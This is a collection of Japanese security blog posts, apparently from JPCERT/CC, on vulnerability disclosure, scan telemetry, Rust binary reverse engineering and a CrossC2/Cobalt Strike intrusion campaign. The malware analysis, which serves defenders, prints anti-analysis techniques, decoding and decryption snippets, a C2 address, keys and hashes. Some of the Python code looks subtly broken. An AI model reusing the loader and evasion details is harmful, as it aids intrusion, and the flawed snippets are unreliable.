こうした調整されない開示が行われると、当該案件だけではなく、後続の将来の脆弱性調整に影響を及ぼします。メーカーは脆弱性発見者側に不信感を抱くようになり、そうした背景から後ろ向きな対応に見えてしまうことで、発見者側はメーカー側に不信感を抱く・・・という不信の連鎖が蓄積します。これは逆のパターンもあり、発見者からの指摘にメーカー側が反応しないケースが増えるようになると、発見者は「メーカーに伝えるとうやむやにされてしまう」と不信感を抱くようになり、フルディスクロージャーに傾くようになります。 法律、ルールというものは、その運用結果が一定度予測できるからこそ成り立つものであり、脆弱性関連情報取扱制度でいえば、「発見者は受付窓口に届け出る」「第三者に勝手に漏えいしない」「公表については調整機関が調整に入る」「製品開発者は脆弱性の修正と公表を行う」というルールが事前に示されることで関係者の動きが見える（予測できる）のです。また、その実績が公開（メーカーからの公表、JVN公表や発見者名の明示）されることで「ルールのとおり関係者が動いたんだな」と検証できるわけです。この予測可能性が担保されているからこそ、各プレーヤーは疑心暗鬼に陥ることなく、脆弱性情報という極めてリスキーな情報を安定して扱うことができるのです。「目的が手段を正当化する」的な動きというのは、そのルールは動いた当人／組織内の事情であり、予測可能性を持ちません。 現行の制度がベストなのか、という論点はまた別の議論になりますが、後編では、あまり知られていない脆弱性が悪用される場合の対処オペレーションの実際を紹介しつつ、制度運用現場／インシデント対応現場から見える今後の課題・論点について考察したいと思います。 <h4> </h4> <h4>参考文献等</h4> <a name="fn1"></a>[1]経済産業省「脆弱性関連情報取扱体制」https://www.meti.go.jp/policy/netsecurity/vulinfo.html ソフトウエア製品等の脆弱性関連情報に関する取扱規定 https://www.meti.go.jp/policy/netsecurity/vul_notification.pdf 情報セキュリティ早期警戒パートナーシップガイドライン https://www.ipa.go.jp/security/guide/vuln/partnership_guide.html ソフトウエア製品開発者による脆弱性対策情報の公表マニュアル https://www.ipa.go.jp/security/reports/vuln/kenkyukai-report2023.html#section6 <a name="fn2"></a>[2]制度全体の改善に係る検討や活動の年次報告等については、情報システム等の脆弱性情報の取扱いに関する研究会の各年度報告書をご参考ください https://www.ipa.go.jp/security/reports/vuln/kenkyukai-report2023.html <a name="fn3"></a>[3]https://www.ipa.go.jp/archive/files/000072543.pdf <a name="fn4"></a>[4]サイバー攻撃被害に係る情報の意図しない開示がもたらす情報共有活動への影響について　https://blogs.jpcert.or.jp/ja/2023/12/leaks-and-breaking-trust.html <a name="fn5"></a>[5]飯田高「法と社会科学をつなぐ」（有斐閣）136ページ <a name="fn6"></a>[6]派生する論点として、法人向け製品の脆弱性悪用事案の場合に、ただちに公表・注意喚起を行わず、基本的に非公開・個別通知で対応を行うことへの賛否があります。この点については、「サイバー攻撃被害に係る情報の共有・公表ガイダンス」97ページをご参照ください https://www.cyber.go.jp/pdf/council/cs/kyogikai/guidance2022_honbun.pdf <a name="fn7"></a>[7]メーカーやユーザーの不利益を防止するということも重要ですが、発見者のモチベーションも、脆弱性発見・修正のサイクルを健全に保つためには重要と考えています。
TSUBAMEレポート Overflow（2025年4～6月）

Thu, 11 Sep 2025 02:00:00 -0000

はじめにこのブログ「TSUBAMEレポート Overflow」では、四半期ごと...

<h3>はじめに</h3> このブログ「TSUBAMEレポート Overflow」では、四半期ごとに公表している「<a href="https://www.jpcert.or.jp/tsubame/report/">インターネット定点観測レポート</a>」の公開にあわせて、レポートには記述していない海外に設置しているセンサーの観測動向の比較や、その他の活動などをまとめて取り上げていきます。 今回は、TSUBAME（インターネット定点観測システム）における2025年4～6月の観測結果についてご紹介します。 <h3>イスラエルとイランの軍事衝突に関連するとみられるイランを送信元としたパケットの変動について</h3> 2025年6月13日から25日ごろにかけてイスラエルとイランの間で軍事衝突がありました。同時期にイランから観測されるパケットに変動がありましたので取り上げてみたいと思います。図1は6月1日から30日について、1日ごとにイランとイスラエルそれぞれの送信元地域からのIPアドレス数の推移をグラフにしたものです。 <table style="border-collapse: collapse; width: 110.24%; height: 36px;" border="1"> <tbody> <tr style="height: 18px;"> <td style="width: 50%; height: 18px;"> <a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig1.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig1.png" width="1179" height="577" alt="" class="asset asset-image at-xid-3752125" style="display: block;"/></a> </td> </tr> <tr style="height: 18px;"> <td style="width: 48.0795%; height: 18px; text-align: center;">図1：イスラエルとイラン、それぞれを送信元としたIPアドレス数の推移</td> </tr> </tbody> </table> イランを送信元とするパケットのIPアドレス数は1日あたり170～200ぐらいで推移していましたが、13日ごろから18日ごろにかけては100～130あたりに減少、19日から27日にかけては20～100ぐらいと一時的に大きく減少したことが見て取れます。それに対して、イスラエルを送信元としたIPアドレス数については大きな変動が見られませんでした。 また、一部のメディアでは、6月18日ごろからイランでは国営放送局や銀行、仮想通貨取引所などに対する攻撃の被害が発生したと報じています。イラン政府はサイバー攻撃被害を軽減するため、インターネット接続を一時的に制限したとも報じており、送信元IPアドレス数の減少はネットワーク遮断の影響を受けたものと考えられます。 <h3>国内外の観測動向の比較</h3> 図2は、国内外のセンサー1台が1日あたりに受信したパケット数の平均を月ごとに比較したものです。国内のセンサーよりも海外のセンサーで多くのパケットを観測しています。国内外どちらのセンサーも4月が最も観測数が多く、月を追うごとに徐々に減少してきています。 <table style="border-collapse: collapse; width: 110.24%; height: 36px;" border="1"> <tbody> <tr style="height: 18px;"> <td style="width: 50%; height: 18px;"> <a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig2.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig2.png" width="1153" height="573" alt="" class="asset asset-image at-xid-3752127" style="display: block;"/></a> </td> </tr> <tr style="height: 18px;"> <td style="width: 48.0795%; height: 18px; text-align: center;">図2：月ごとの国内外センサー平均パケット数の比較</td> </tr> </tbody> </table> <h3>センサーごとの観測動向の比較</h3> 各センサーには、それぞれグローバルIPアドレスが1つ割り当てられています。国内、北米、欧州、それ以外の地域の各センサーで観測状況に違いがあるかを見るために、表1に届いたパケットTOP10をまとめました。センサーごとに順位に違いはありますが、22/TCP、23/TCP、80/TCP、443/TCP、8080/TCP等はほぼすべてのセンサーで観測していました。これらは広範囲のネットワークにてスキャンが行われていることを示唆していると考えられます。 表1：国内外センサーごとのパケットTOP10の比較 <table> <tbody> <tr><th></th><th>国内センサー1</th><th>国内センサー2</th><th>北米センサー1</th><th>北米センサー2</th><th>欧州センサー1</th><th>欧州センサー2</th><th>その他の地域のセンサー1</th><th>その他の地域のセンサー2</th></tr> <tr><td align="right">1番目</td><td>23/TCP</td><td>23/TCP</td><td>80/TCP</td><td>80/TCP</td><td>23/TCP</td><td>23/TCP</td><td>23/TCP</td><td>23/TCPP</td></tr> <tr><td align="right">2番目</td><td>443/TCP</td><td>8728/TCP</td><td>22/TCP</td><td>ICMP</td><td>443/TCP</td><td>22/TCP</td><td>80/TCP</td><td>80/TCP</td></tr> <tr><td align="right">3番目</td><td>80/TCP</td><td>80/TCP</td><td>8728/TCP</td><td>443/TCP</td><td>80/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td></tr> <tr><td align="right">4番目</td><td>8443/TCP</td><td>22/TCP</td><td>23/TCP</td><td>23/TCP</td><td>22/TCP</td><td>80/TCP</td><td>22/TCP</td><td>443/TCP</td></tr> <tr><td align="right">5番目</td><td>8728/TCP</td><td>ICMP</td><td>443/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>34567/TCP</td><td>443/TCP</td><td>22/TCP</td></tr> <tr><td align="right">6番目</td><td>22/TCP</td><td>443/TCP</td><td>8080/TCP</td><td>22/TCP</td><td>445/TCP</td><td>ICMP</td><td>ICMP</td><td>ICMP</td></tr> <tr><td align="right">7番目</td><td>ICMP</td><td>81/TCP</td><td>ICMP</td><td>8080/TCP</td><td>ICMP</td><td>443/TCP</td><td>8080/TCP</td><td>8080/TCP</td></tr> <tr><td align="right">8番目</td><td>8080/TCP</td><td>8080/TCP</td><td>3389/TCP</td><td>6379/TCP</td><td>8080/TCP</td><td>81/TCP</td><td>81/TCP</td><td>81/TCP</td></tr> <tr><td align="right">9番目</td><td>81/TCP</td><td>5555/TCP</td><td>445/TCP</td><td>3389/TCP</td><td>1433/TCP</td><td>8080/TCP</td><td>5555/TCP</td><td>5555/TCP</td></tr> <tr><td align="right">10番目</td><td>6379/TCP</td><td>3389/TCP</td><td>81/TCP</td><td>81/TCP</td><td>6379/TCP</td><td>445/TCP</td><td>6379/TCP</td><td>6379/TCP</td></tr> </tbody> </table> <h3>おわりに </h3> 複数の地点で観測を行うことで、特定のネットワークだけで変動が起きているのかどうかを判断できるようになります。本四半期は、特別な号外による注意喚起等の情報発信には至っていませんが、スキャナーの存在には注意が必要です。今後もレポート公開にあわせて定期的なブログの発行を予定しています。特異な変化などがあった際は号外も出したいと思います。皆さまからのご意見、ご感想も募集しております。掘り下げて欲しい項目や、紹介して欲しい内容などがございましたら、お問い合わせフォームよりお送りください。最後までお読みいただきありがとうございました。 サイバーメトリクスグループ鹿野恵祐 TSUBAMEレポート Overflow（2025年4～6月）
Rustで作成されたバイナリのリバースエンジニアリング調査レポートの公開

Tue, 02 Sep 2025 02:00:00 -0000

Rustは、CやC++を代替する言語として期待されている言語であり、メモリ安全性...

Rustは、CやC++を代替する言語として期待されている言語であり、メモリ安全性や高速性に優れていることから近年注目されています。 Rustがプログラミング言語として普及していく反面、SysJokerのRust亜種やBlackCatランサムウェアなどRustを用いて開発されたマルウェア（以下、「Rustマルウェア」という。）が近年増加傾向にあります。しかしながら、Rustマルウェアに対するリバースエンジニアリング手法に関する知見は、古典的なC・C++マルウェアのリバースエンジニアリング手法と比較して十分ではありません。そのため、JPCERT/CCでは、Rustで作成されたバイナリ(以下、「Rustバイナリ」という。)に対するリバースエンジニアリングに関して検証した結果をまとめた「Rustで作成されたバイナリのリバースエンジニアリング調査レポート」を本日公開しました。 <a href="https://github.com/JPCERTCC/rust-binary-analysis-research-ja">Rustで作成されたバイナリのリバースエンジニアリング調査レポート</a> 今回はこのレポートについて紹介したいと思います。 <h3>レポートの内容</h3> 本レポートは、Rustバイナリのリバースエンジニアリングに関する調査項目を選定し、調査・検証を行った結果をまとめたものです。レポートの詳細な調査項目については Appendix Aをご覧ください。また、本調査で使用したツールのバージョンは以下のとおりです。加えて、バイナリのコンパイルは Windows MSVC環境を使用して調査・検証を実施しました。 <pre style="background:#25292f;color: #fff;"> <code> cargo: 1.82.0 rustc: 1.82.0 IDA Pro v8.3.230608 </code> </pre> <h3>活用イメージ</h3> 本レポートは、調査項目ごとに独立しているため、全体を通読するのではなく、気になる調査項目のみを参照できます。一部の調査項目にはサンプルプログラムも記載しています。そのため、関心のある項目を確認した上で、サンプルプログラムを実際にコンパイルし、レポートとあわせてRustバイナリを確認することを推奨します。 <h3>おわりに</h3> Rustは急速に普及している言語であり、リバースエンジニアリングが比較的困難とされることから、攻撃者による悪用が増加すると考えられます。本レポートがRustマルウェアのリバースエンジニアリングに少しでも役立てば幸いです。記載内容に不備やご意見がございましたら、ぜひお寄せください。 インシデントレスポンスグループ亀井智矢 <h3>Appendix A: 調査項目</h3> <table> <thead> <caption>表1: 調査項目</caption> <tr> <td style="background-color: #bdbdbd; width: 50px; text-align: center;">No.</td> <td style="background-color: #bdbdbd; width: 350px; text-align: center;">項番</td> <td style="background-color: #bdbdbd; width: 500px; text-align: center;">概要</td> </tr> </thead> <tbody> <tr> <td>1</td> <td>CargoのProfile設定の変更に伴うバイナリの差分</td> <td>公開情報から得られるcargoを用いたバイナリサイズ削減手法が、どの程度サイズ削減可能なのか、残留する情報はどのようなものか調査</td> </tr> <tr> <td>2</td> <td>バイナリサイズ削減</td> <td>公開情報から得られるrustcを用いたバイナリサイズ削減手法が、どの程度サイズ削減可能なのか、残留する情報はどのようなものか調査</td> </tr> <tr> <td>3</td> <td>Rustバイナリの識別</td> <td>Rustからコンパイルされたバイナリか否かを識別する方法の調査</td> </tr> <tr> <td>4</td> <td>Exception Directory</td> <td>Exception Directoryの構造から得られる情報の調査</td> </tr> <tr> <td>5</td> <td>TLS Directory</td> <td>TLS Directoryの構造とTLS Callbackの内容から得られる情報の調査</td> </tr> <tr> <td>6</td> <td>main関数の特定と初期化処理</td> <td>ユーザー定義のmain関数の特定方法</td> </tr> <tr> <td>7</td> <td>文字列</td> <td>文字列の取り扱い方法</td> </tr> <tr> <td>8</td> <td>関数名のマングリング</td> <td>マングリングされた関数名の構造およびデマングリング方法</td> </tr> <tr> <td>9</td> <td>クロージャ</td> <td>クロージャの動作や使用されるメモリレイアウト</td> </tr> <tr> <td>10</td> <td>列挙型</td> <td>Rustにおける列挙型の動作がアセンブリにてどのように実装されるかの調査</td> </tr> <tr> <td>11</td> <td>match文</td> <td>Rustにおけるmatch文の動作がアセンブリにてどのように実装されるかの調査</td> </tr> <tr> <td>12</td> <td>Panic文</td> <td>パニック時の挙動であるunwindとabortのアセンブリの差分</td> </tr> <tr> <td>13</td> <td>イテレータ</td> <td>イテレータやnext関数を使用したコードがアセンブリにてどのように実装されるかの調査</td> </tr> <tr> <td>14</td> <td>トレイト</td> <td>トレイトを実装した関数呼び出しと通常の関数呼び出しとの差異</td> </tr> <tr> <td>15</td> <td>代表的なトレイトの識別</td> <td>#\[derive\]属性で用いられるトレイトのアセンブリ上で識別方法</td> </tr> <tr> <td>16</td> <td>動的ディスパッチ参照</td> <td>アセンブリの特徴および動的／静的ディスパッチを用いた呼び出しの差異</td> </tr> <tr> <td>17</td> <td>コレクション</td> <td>使用されるメモリレイアウト</td> </tr> <tr> <td>18</td> <td>同一ジェネリクスから生成された関数の識別</td> <td>生成元となった関数を特定方法の調査</td> </tr> <tr> <td>19</td> <td>スマートポインター</td> <td>スマートポインターの特徴やメモリレイアウト</td> </tr> <tr> <td>20</td> <td>インラインアセンブリ</td> <td>特徴的なコードパターン</td> </tr> <tr> <td>21</td> <td>link属性</td> <td>ライブラリのリンク方法の差異</td> </tr> <tr> <td>22</td> <td>repr属性</td> <td>指定可能なオプションにおいてメモリレイアウトがどのように変化するかの調査</td> </tr> <tr> <td>23</td> <td>標準・サードパーティライブラリの判別方法</td> <td>静的リンクされた標準ライブラリ・サードパーティライブラリ関数の識別の方法</td> </tr> </tbody> </table>
Cobalt Strike Beaconの機能をクロスプラットフォームへと拡張するツール「CrossC2」を使った攻撃

Thu, 14 Aug 2025 05:00:00 -0000

JPCERT/CCでは、2024年9月から12月にかけて、Linux上で動作する...

JPCERT/CCでは、2024年9月から12月にかけて、Linux上で動作するCobalt Strike Beaconを作成可能な拡張ツールCrossC2を使ったインシデントを確認しました。この攻撃者は、CrossC2以外にもPsExecやPlink、Cobalt Strikeを使用してADへの侵入を試みていました。さらに、Cobalt Strikeのローダーとして独自のマルウェア（以下、「ReadNimeLoader」という。）を使用していることを確認しています。この攻撃キャンペーンは、VirusTotalのSubmit情報から、日本だけでなく複数の国で観測されていた可能性があります。 今回は、この攻撃キャンペーンで確認したマルウェアCrossC2およびCobalt Strike、攻撃者が使用するツールについて解説します。また、最後にJPCERT/CCが公開したCrossC2の分析をサポートするツールについても紹介します。 <h3>CrossC2</h3> CrossC2はC言語で作成されたCobalt StrikeのVersion 4.1以上に対応した非公式のBeaconとそのビルダーです。Linux（x86、x64）、macOS（x86、x64、M1）のアーキテクチャで動作するよう開発されています。CrossC2のビルダーはGitHub<a href="#1">[1]</a>で公開されており、Beaconを作成することができますが、ビルダーのソースコードや、Beaconのソースコードは公開されていません。 CrossC2は実行するとすぐにForkし、メインの処理は子プロセス上で行われます。通信先はコンフィグから取得しますが、環境変数"CCHOST"と"CCPORT"からC2サーバーのホストとポート番号を取得することも可能です。実行後、CrossC2はCobalt StrikeのTeamServerと通信を行い、Cobalt Strikeの各種コマンドを実行することができますが、実行可能なコマンドは本来のCobalt Strikeの機能と比べて多くはありません。Beaconの特徴として次に示す複数の解析妨害機能が実装されています。 <ul> <li>1バイトXORによる文字列のエンコード</li> <li>大量の無意味なコードの挿入</li> </ul> 図1に挿入されている無意味なコードの一部を示します。主要な関数には大量に無意味なコードが挿入されていますが、次のバイト列をNOP命令に置換することで容易に難読化解除が可能です。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> 8B 85 ?? ?? ?? ?? 2D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 00 00 00 00 </pre> <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS01-800wri.png" width="800" height="912" alt="" class="asset asset-image at-xid-3824881 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図1：CrossC2の難読化コードの一部 </div> コンフィグデータはファイル末尾に格納されており、CrossC2はreadlink関数にて自身のファイルパスを取得後、自身のコードをfreadし、"HOOK"という文字列が見つかるまで検索することでコンフィグデータのアドレスを取得しています。コンフィグの構造は以下のようになっており、暗号化されたコンフィグデータはAES128-CBC（no-padding）で復号することができます。なお、CrossC2はOpenSSLライブラリの関数を使用して復号しています。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> 0x0："HOOK" 検索タグ 0x4：コンフィグデータのサイズ 0x8：暗号化されたコンフィグデータ </pre> CrossC2は正規のTeamServerの拡張機能を利用してBeaconを作成することができます。作成されたBeaconはデフォルトの設定ではUPXでパックされていますが、UPXでアンパックしようとすると失敗してしまうため、アンパックする場合は、一度ファイル末尾のコンフィグ情報を取り除いた後にUPXにてアンパックを行い、アンパック後のファイル末尾にコンフィグ情報を追加する必要があります。 <h3>Cobalt Strike</h3> 図2にCobalt Strikeが実行されるまでの流れを示します。マルウェアの実行の起点となるのは、攻撃者によって登録されたタスクスケジューラから実行される正規ファイルのjava.exeです。java.exeは、DLLサイドローディングによってReadNimeLoaderであるjli.dllをロードします。ReadNimeLoaderは、Nim言語で作成されたローダーです。ReadNimeLoaderは同一フォルダーにあるデータファイルreadme.txtを読み込み、復号した後、メモリ上で実行します。readme.txtには、オープンソースのShellcode形式ローダーであるOdinLdr<a href="#2">[2]</a>が含まれており、OdinLdrが内部にエンコードされているCobalt Strike Beaconをデコードし、メモリ上で実行します。なお、ReadNimeLoaderなどファイル一式は被害端末の"C:\$recycle.bin\"のパスに保存されていました。また、一部のReadNimeLoaderに以下のPDBパスが設定されていたことを確認しています。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> D:\BuildServer\bna-4\work-git\phoenix-repository\phoenix\Release\Battle.net Launcher.exe.pdb </pre> <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS02-800wri.png" width="800" height="337" alt="" class="asset asset-image at-xid-3824886 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図2：Cobalt Strikeが実行されるまでの動作フロー </div> <h4>ReadNimeLoader</h4> ReadNimeLoaderの特徴として次に示す4つの耐解析機能があります。 <ul> <li>PEBのBeingDebuggedの値によるデバッグの有無のチェック</li> <li>CONTEXT_DEBUG_REGISTERの値によるデバッグの有無のチェック</li> <li>経過時間の差分を取得し、その値がある0x512以上であればデバッグの有無のチェック</li> <li>例外を発生させ、例外ハンドラーが取得されるかをチェックすることによるデバッグの有無のチェック</li> </ul> 上記の耐解析機能の関数内部にOdinLdrの復号に必要な鍵の一部が格納されており、その関数を実行しないと正しい鍵が生成されず、OdinLdrを復号できない仕組みになっています。また、それ以外の耐解析機能として無意味なコードが挿入されています。そのコードの一部を図3に示します。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS03-640wri.png" width="640" height="629" alt="" class="asset asset-image at-xid-3824887 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図3：妨害コードの一部 </div> ReadNimeLoaderが使用する文字列はエンコードされており、XORをベースとした2つの特徴的なデコード関数が使用されます。そのコードの一部を図4にそれぞれ示します。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS04-800wri.png" width="800" height="370" alt="" class="asset asset-image at-xid-3824888 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図4：各デコード関数 </div> エンコードされた文字列は、次に示すPythonスクリプトでデコードすることが可能です。なお、古いバージョンのReadNimeLoaderではPythonスクリプトのdecode02の関数に該当するデコード関数は存在しておらず、バージョンアップによって後から追加された関数と考えられます。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> def BYTE1(in_data): return (in_data >> 8) & 0xff def BYTE2(in_data): return (in_data >> 16) & 0xff def BYTE3(in_data): return (in_data >> 24) & 0xff def decode02(enc_bytes, xor_key): result = [] for enc_byte in enc_bytes: enc_byte ^= BYTE3(xor_key) & 0xEE ^ BYTE2(xor_key) & 0xEE ^ (xor_key ^ BYTE1(xor_key)) & 0xEE result.append(i) enc_byte += 1 return result def decode01(enc_bytes, xor_key): xor_table = [ 0, 8, 0x10, 0x18] result = [] for enc_byte in enc_bytes: for j in range(4): enc_byte ^= ((xor_key >> xor_table[j]) & 0xEE) result.append(i) return result </pre> ReadNimeLoaderはマルウェア本体の復号方法にAES256-ECBモードを使用します。復号に使用する鍵は前述したデコード関数でデコードされた特定の文字列をつなげて一つの文字列にし、それらを16進数へと変換した後、文字列として大文字へ変換し、ゼロパディングしたものを使用します。次に示すPythonスクリプトで復号することが可能です。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> from Crypto.Cipher import AES import binascii def ZeroPadding(hexstr, num): padding_num = num - len(hexstr) if padding_num < 0: return hexstr return hexstr + b"\x00" * padding_num def decrypt(readme_data, key_string): capitalized_key = binascii.hexlify(ascii_to_bytes(key_string)).upper() key = ZeroPadding(capitalized_key, 32) Cipher = AES.new(key, AES.MODE_ECB) return Cipher.decrypt(readme_data) </pre> <h4>OdinLdr</h4> OdinLdrは実行後に内部にエンコードされたCobalt Strike Beaconを復号し、メモリ上で動作しますが、一定周期でランダムに生成されるXOR鍵をもとに新しく確保したヒープメモリ上に暗号化される仕組みであり、メモリのスキャンなどを回避することを狙って使用されたものと思われます。ヒープメモリの先頭アドレスに"OdinLdr1337"という文字列がある点が特徴としてあげられます。なお、ReadNimeLoaderが展開するShellcodeにはOdinLdrを介してCobalt Strike Beaconを実行するものと直接Cobalt Strike Beaconを実行するサンプルも確認されています。 Appendix BにReadNimeLoaderのバージョンとマルウェア本体をデコードする際に使用する鍵、ロードするreadme.txt、エンコードされるマルウェア本体の対応関係を記載します。なお、使用されたCobalt Strikeのコンフィグの一部をAppendixに記載しています。 <h3>攻撃者が使用するツール</h3> 攻撃者によって使用されたツールとして、複数のELF版のSystemBCが使用されていました。Windows版SystemBCとの差分などの情報はanyrunによる報告<a href="#3">[3]</a>をご覧ください。その他使用されたツールとして、横展開に使用されることが多いPsExec、AS-REP Roasting攻撃に使用されるGetNPUsers<a href="#4">[4]</a>、SSHクライアントツールのPlink、Windowsにおける権限昇格ツールなどが確認されています。 <h3>帰属</h3> 確認したCobalt StrikeのC2に使用されたドメインがRapid7によって公開されているBlackBastaの記事<a href="#5">[5]</a>のC2と同一である点、ReadNimeLoaderに使用されるjli.dllとreadme.txtというファイル名の各ファイルが使用された点、動作するアーキテクチャは異なるもののSystemBCを使用する点やADへの攻撃にAS-REPを使用する点も一致していることから、本攻撃者および攻撃キャンペーンはBlackBastaと何らかの関係がある可能性が考えられます。 <h3>CrossC2の分析ツール</h3> CrossC2用分析ツールとして、コンフィグパーサーをGitHub上で公開していますので、ご活用ください。 GitHub：JPCERTCC/aa-tools/parse_crossc2beacon_config.py <a href="https://github.com/JPCERTCC/aa-tools/blob/master/parse_crossc2beacon_config.py" target="_blank">https://github.com/JPCERTCC/aa-tools/blob/master/parse_crossc2beacon_config.py</a> なお、CrossC2はLinuxだけでなく、macOS向けのバイナリを生成することもできますが、本コンフィグパーサーはmacOS向けバイナリにも対応しています。図5にコンフィグパーサーの実行結果の例を示します。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS05-800wri.png" width="800" height="689" alt="" class="asset asset-image at-xid-3824889 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図5：コンフィグパーサーの動作例 </div> <h3>おわりに</h3> Cobalt Strikeを使ったインシデントは数多く存在しますが、Cobalt Strike Beaconの機能をクロスプラットフォームへと拡張するツールCrossC2が攻撃に利用され、内部ネットワークにあるLinuxサーバーが侵害される事例を今回確認しました。LinuxサーバーにはEDRなどが導入されていない場合も多く、侵害範囲を拡大する起点になり得るため、注意が必要です。今回解説した情報をインシデント対応や分析などにご活用いただければ幸いです。確認したマルウェアの通信先やハッシュ値については、Appendixに記載していますのでそれぞれご確認ください。 インシデントレスポンスグループ増渕維摩 <h4>参考情報</h4> <a name="1"></a>[1] CrossC2 <a href="https://github.com/gloxec/CrossC2" target="_blank"> https://github.com/gloxec/CrossC2</a> <a name="2"></a>[2] OdinLdr <a href="https://github.com/emdnaia/OdinLdr" target="_blank"> https://github.com/emdnaia/OdinLdr</a> <a name="3"></a>[3] ANY.RUN A new SystemBC RAT is targeting Linux-based platforms <a href="https://x.com/anyrun_app/status/1884207667058463188" target="_blank"> https://x.com/anyrun_app/status/1884207667058463188</a> <a name="4"></a>[4] GetNPUsers.py <a href="https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py" target="_blank"> https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py</a> <a name="5"></a>[5] Rapid7 BlackSuit Continues Social Engineering Attacks in Wake of Black Basta’s Internal Conflict <a href="https://www.rapid7.com/blog/post/2025/06/10/blacksuit-continues-social-engineering-attacks-in-wake-of-black-bastas-internal-conflict/" target="_blank"> https://www.rapid7.com/blog/post/2025/06/10/blacksuit-continues-social-engineering-attacks-in-wake-of-black-bastas-internal-conflict/</a> <h4>Appendix A：CrossC2のコンフィグの例</h4> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> C2: 162.33.179[.]247:8443 PUBLICKEY: -----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCaW 34Iv7znqVuomjiJn4Yr1ck9YSWylfAoiy20DnR0ab CoHtdPK3L05CgOjnLGSfM5Vji0IRd8xtCGpU699Jt FCa/Jg7zmuejilkKTFpMB36+49UQtaYp4KjFuImRC z72NdzszsLzHDlVWAPmn5CSTfsTIzceomQfmCDY// IygzQIDAQAB -----END PUBLIC KEY----- </pre> <h4>Appendix B：ReadNimeLoaderとマルウェア本体との対応関係</h4> 表1 ReadNimeLoaderとマルウェア本体との対応関係 <table style="table-layout: fixed; width: 100%;"> <colgroup> <col style="width: 24%;"> <col style="width: 9%;"> <col style="width: 30%;"> <col style="width: 24%;"> <col style="width: 13%;"> </colgroup> <thead> <tr> <th>ReadNimeLoader Hash(SHA256)</th> <th>Version</th> <th>Key</th> <th>readme.txt Hash(SHA256)</th> <th>Encoded Malware</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word; white-space: normal;">56b941f6dcb769ae6d6995412559012abab830f05d5d8acf2648f7fa48c20833</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("mfzuyqroasv")) + zero padding</td> <td style="word-wrap: break-word; white-space: normal;">6246fb5c8b714707ac49ade53e6fe5017d96442db393b1c0ba964698ae24245d</td> <td style="word-wrap: break-word; white-space: normal;">OdinLdr + CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">dfe79b9c57cfb9fc10597b43af1c0a798991b6ceeec2af9b1e0ed46e6a8661c8</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("vbewtdsmmswfweoz"))</td> <td style="word-wrap: break-word; white-space: normal;">acdf2a87ed03f2c6fe1d9899e8a74e8b56f7b77bb8aed5adf2cc374ee5465168</td> <td style="word-wrap: break-word; white-space: normal;">OdinLdr + CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">3f96b6589996e57abc1c4d9b732528d2d11dea5c814f8241170c14ca2cd0281d</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("lgehaoevolq")) + zero padding</td> <td style="word-wrap: break-word; white-space: normal;">6b80d602472c76b1d0f05bcce62e0a34de758232d9d570ba61b540784c663c01</td> <td style="word-wrap: break-word; white-space: normal;">CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">0ab709728666f8759ad8db574d4009cf74ebce36ef2572ef52b058997a9b2a25</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("ffjazoinsmsiywwt"))</td> <td style="word-wrap: break-word; white-space: normal;">3079a29575a0adff91f04c5493a7f3e1c89795e3a90cf842650cd8bd45c4e1bc</td> <td style="word-wrap: break-word; white-space: normal;">CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ecca3194613b0bab02059c3544fdc90f6d4af5a4c06518c853517eb1d81b9735</td> <td style="word-wrap: break-word; white-space: normal;">Old</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("bcstctskmngpjjax"))</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ad90a4490d82c7bd300fdbbdca0336e5ad2219d63ea0f08cebc33050d65b7ef2</td> <td style="word-wrap: break-word; white-space: normal;">Old</td> <td style="word-wrap: break-word; white-space: 